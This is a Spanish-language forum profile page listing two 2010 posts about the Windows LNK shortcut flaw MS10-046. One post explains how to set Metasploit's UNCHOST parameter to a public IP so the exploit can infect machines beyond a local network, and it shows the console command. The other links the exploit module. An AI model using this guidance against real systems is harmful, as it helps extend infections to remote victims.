Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - byte256

Páginas1
#1
Bugs y Exploits / Re: Vulnerabilidad MS10-046 Agosto 2010.- (ícono acceso directo)
9 Agosto 2010, 15:42 PM
Cita de: Debci en  9 Agosto 2010, 10:56 AM
Ademas, cuando acedo a la url me lleva a mi IP interna, por lo que solo podria infectar gente de mi LAN!



Hola se podría también para WAN, modificando el valor del parámetro UNCHOST, y poner ahi la IP pública.

Citar
para especificar una dirección diferente para el recurso compartido agregamos este parámetro en la configuración:

Código:

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set UNCHOST 192.168.0.254
UNCHOST => 192.168.0.254

Esto puede ser necesario para explotar la vulnerabilidad en WAN. En este parámetro iría nuestra IP publica.

http://comunidad.dragonjar.org/f184/explotar-vulnerabilidad-lnk-de-windows-con-metasploit-10302/

Saludos


#2
Bugs y Exploits / Re: Microsoft Windows automatic LNK shortcut file code execution exploit.
21 Julio 2010, 11:51 AM

Hola! viendo en la web de metasploit, ya salio el exploit para esta vulnerabilidad.

http://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms10_xxx_windows_shell_lnk_execute.rb

Saludos



Páginas1